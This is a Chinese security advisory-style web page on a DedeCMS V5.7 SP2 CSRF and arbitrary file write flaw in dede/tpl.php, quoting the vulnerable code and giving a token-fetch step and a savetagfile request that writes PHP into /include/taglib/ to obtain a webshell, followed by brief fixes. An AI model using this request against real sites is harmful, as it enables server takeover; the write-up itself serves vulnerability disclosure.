dedecms V5.7 SP2 友情链接CSRF+任意文件写入漏洞

作者: 本站原创  发布时间:  浏览:

DedeCMS V5.7 SP2版本中tpl.php存在代码执行漏洞,攻击者可利用该漏洞在增加新的标签中上传木马,获取webshell。笔者是2018年2月28日在官网下载的DedeCMS V5.7 SP2版本程序,截至发稿,漏洞依然存在。

漏洞详情

织梦默认的后台地址是/dede/,当然也可以被更改,到时候根据网站具体情况替换默认后台地址即可。

dede/tpl.php中第251行到281行

 

csrf_check();

 

if(!preg_match("#^[a-z0-9_-]{1,}\.lib\.php$#i", $filename))

 

{

 

    ShowMsg('文件名不合法,不允许进行操作!', '-1');

 

    exit();

 

}

 

require_once(DEDEINC.'/oxwindow.class.php');

 

$tagname = preg_replace("#\.lib\.php$#i", "", $filename);

 

$content = stripslashes($content);

 

$truefile = DEDEINC.'/taglib/'.$filename;

 

$fp = fopen($truefile, 'w');

 

fwrite($fp, $content);

 

fclose($fp);

 

1.由于dedecms全局变量注册的特性,所以这里的content变量和filename变量可控。

2.可以看到将content直接写入到文件中导致可以getshell。但是这里的文件名经过正则表达式,所以必须要.lib.php结尾。

注意: 这里还有一个csrf_check()函数,即请求中必须要带token参数。

漏洞利用

1.首先获取token 访问 域名 + /dede/tpl.php?action=upload。在页面源代码中获取到token值 

dedecms V5.7 SP2 友情链接CSRF+任意文件写入漏洞

然后访问 :

域名 + /dede/tpl.php?filename=moonsec.lib.php&action=savetagfile&content=%3C?php%20phpinfo();?%3E&token=[你的token值

dedecms V5.7 SP2 友情链接CSRF+任意文件写入漏洞

shell:域名 + /include/taglib/moonsec.lib.php

漏洞修复

1.禁止/include/taglib/此处写入文件。

2.过滤恶意标签

3.删除dede/tpl.php 文件

上一篇:[360检测警告]DedeCMS V5.7 download.php url重定向漏洞

下一篇:Dedecms_V5.7 getshell 利用后台文件上传功能漏洞

相关文章

最新织梦cms漏洞之安全设置,有效防护木马(更新

织梦安全:更改plus名称

阿里云提醒/member/reg_new.php注入漏洞解决办法

织梦程序网站被挂马或快照劫持终极解决办法

dedecms织梦导致CPU峰值现象的解决办法

添加微信
添加微信,免费咨询

15205695834

新手指南支付购买售后服务关于我们版权合规
合肥秀站网络科技有限公司
Copyright 2002-2022 麦站 版权所有
皖ICP备12018676号 网站地图